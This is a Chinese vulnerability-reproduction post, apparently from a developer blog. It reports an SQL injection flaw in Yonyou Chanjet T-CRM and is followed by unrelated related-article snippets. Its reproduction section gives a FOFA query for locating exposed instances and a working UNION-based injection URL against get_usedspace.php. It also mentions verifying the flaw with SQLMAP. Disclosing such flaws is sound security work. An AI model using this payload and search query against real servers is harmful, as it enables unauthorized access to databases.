用友畅捷CRM存在SQL注入漏洞

简介: 用友畅捷CRM存在SQL注入漏洞,攻击者可通过使用工具获取数据库相关敏感信息,拿到服务器控制权限。

声明


本篇文章仅用于漏洞复现与技术研究,请勿利用文章内的相关技术从事非法测试,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

一、畅姐CRM简介


用友畅捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 "提升营销能力,网罗天下商机"。


二、漏洞描述


畅捷CRM系统 存在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。


三、漏洞复现


FOFA:title="畅捷CRM"

image.png


漏洞链接:http://x.x.x.x:port/webservice/get_usedspace.php?site_id=-999%20UNION%20ALL%20SELECT%20CONCAT(0x7e,0x7e,user(),0x7e,0x7e)--

image.png

使用SQLMAP验证

image.png

四、整改建议


请各单位关注厂商及时更新:http://www.realor.cn

目录
相关文章
|
2月前
|
SQL Web App开发 安全
SQL Server 2025 年 8 月更新 - 修复 CVE-2025-49759 SQL Server 特权提升漏洞
SQL Server 2025 年 8 月更新 - 修复 CVE-2025-49759 SQL Server 特权提升漏洞
169 2
SQL Server 2025 年 8 月更新 - 修复 CVE-2025-49759 SQL Server 特权提升漏洞
|
1月前
|
SQL Web App开发 安全
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
87 0
SQL Server 2025 年 9 月更新 - 修复 CVE-2025-47997 SQL Server 信息泄露漏洞
|
3月前
|
SQL Web App开发 安全
SQL Server 2025年7月更新 - 修复 CVE-2025-49718 Microsoft SQL Server 信息泄露漏洞
SQL Server 2025年7月更新 - 修复 CVE-2025-49718 Microsoft SQL Server 信息泄露漏洞
306 0
SQL Server 2025年7月更新 - 修复 CVE-2025-49718 Microsoft SQL Server 信息泄露漏洞
|
9月前
|
SQL 安全 数据库
如何在Django中正确使用参数化查询或ORM来避免SQL注入漏洞?
如何在Django中正确使用参数化查询或ORM来避免SQL注入漏洞?
570 77
|
9月前
|
SQL 安全 数据库连接
除了使用Django的ORM,还能通过什么方式在Django中避免SQL注入漏洞?
除了使用Django的ORM,还能通过什么方式在Django中避免SQL注入漏洞?
238 73
|
7月前
|
SQL 安全 PHP
thinkphp5之sql注入漏洞-builder处漏洞
在Web应用开发中,SQL注入是一种需要高度警惕的安全漏洞。通过深入理解ThinkPHP5中的SQL查询机制,并结合安全编码实践,开发者可以有效防止SQL注入攻击,保障应用的安全性和稳定性。
331 13
|
9月前
|
人工智能 自然语言处理 数据挖掘
销售易、八百客、用友CRM:行业应用与选型建议
在数字化时代,CRM系统是企业提升销售效率、优化客户体验和增强竞争力的关键工具。本文深度剖析了销售易CRM、八百客CRM和用友CRM,从品牌介绍和适用企业两方面帮助企业选择最适合的CRM解决方案。 - **销售易CRM**:成立于2011年,融合移动、AI等技术,适合全渠道营销和销售流程自动化的大型及跨国公司。 - **八百客CRM**:专注于中小企业,提供移动化、社交化的CRM服务,操作简便,快速上手。 - **用友CRM**:集成财务管理,适合已使用用友财务软件的中大型企业,实现一体化管理。 企业在选择时应根据自身需求、预算和发展规划,挑选最合适的CRM系统。
|
9月前
|
自然语言处理 搜索推荐 数据挖掘
销售易、八百客、用友CRM:行业应用与选型建议
在数字化转型浪潮中,CRM系统成为企业提升销售效率、优化客户体验和增强竞争力的关键工具。本文深度剖析了销售易CRM、八百客CRM和用友CRM,从产品功能和优势特色两方面进行总结。销售易CRM适合大型企业和跨国公司,提供全面的客户管理、销售自动化、营销自动化等功能;八百客CRM以其易用性和移动办公特性,适合中小企业;用友CRM则以综合管理和定制化解决方案见长,适合需要一体化管理的中大型企业。企业应根据自身需求选择最适合的CRM系统,助力数字化转型。
|
11月前
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
366 2
|
10月前
|
数据挖掘
企业成长伙伴:销售易、创客、用友CRM系统的特色与适用性
销售易、创客和用友是企业资源规划和客户关系管理领域的三大品牌。销售易专注于CRM解决方案,提供从线索到现金的全流程管理,适用于追求高效率的大型企业;创客为中小企业提供低成本、易用的CRM系统,助力业务增长;用友则以其强大的集成能力和行业解决方案,服务于中大型企业,特别是在制造业和金融服务业。选择CRM系统时,企业应根据自身需求、预算和发展规划,挑选最适合的解决方案。